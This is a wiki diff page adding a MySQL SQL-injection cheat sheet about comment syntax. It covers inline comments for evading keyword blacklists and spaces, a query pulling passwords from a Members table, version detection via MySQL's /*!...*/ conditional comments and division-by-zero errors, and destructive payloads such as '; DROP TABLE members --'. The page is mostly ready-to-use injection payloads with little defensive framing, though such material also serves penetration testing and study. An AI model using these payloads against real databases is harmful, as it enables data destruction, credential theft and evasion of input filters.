Differences

This shows you the differences between two versions of the page.

--- hacking:sql_injection:mysql:comments [2020/04/16 21:36] – peter
+++ hacking:sql_injection:mysql:comments [2020/07/15 09:30] (current) – external edit 127.0.0.1
@@ Line 25: / Line 25: @@
 ----
+===== Inline Comments =====
+Comment out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
+<code sql>
+/*Comment Here*/
+DROP/*comment*/sampletable
+DR/**/OP/*bypass blacklisting*/sampletable
+SELECT/*avoid-spaces*/password/**/FROM/**/Members
+</code>
+----
+==== Special Comment Syntax for MySQL ====
+This is a special comment syntax for MySQL.
+<code sql>
+/*! MYSQL Special SQL */
+</code>
+It's perfect for detecting MySQL version. If you put a code into this comments it's going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.
+<code sql>
+SELECT /*!32302 1/0, */ 1 FROM tablename
+</code>
+----
+==== Classical Inline Comment SQL Injection Attack Samples ====
+<code sql>
+ID: 10; DROP TABLE members /*
+</code>
+Simply get rid of other stuff at the end the of query. Same as:
+<code sql>
+; DROP TABLE members --
+</code>
+----
+==== Division by 0 error ====
+<code sql>
+SELECT /*!32302 1/0, */ 1 FROM tablename
+</code>
+Will throw a division by 0 error if MySQL version is higher than3.23.02
+----
+==== MySQL Version Detection Sample Attacks ====
+<code sql>
+ID: /*!32302 10*/
+ID: 10
+</code>
+You will get the same response if MySQL version is higher than 3.23.02
+<code sql>
+SELECT /*!32302 1/0, */ 1 FROM tablename
+</code>
+Will throw a division by 0 error if MySQL version is higher than3.23.02
+----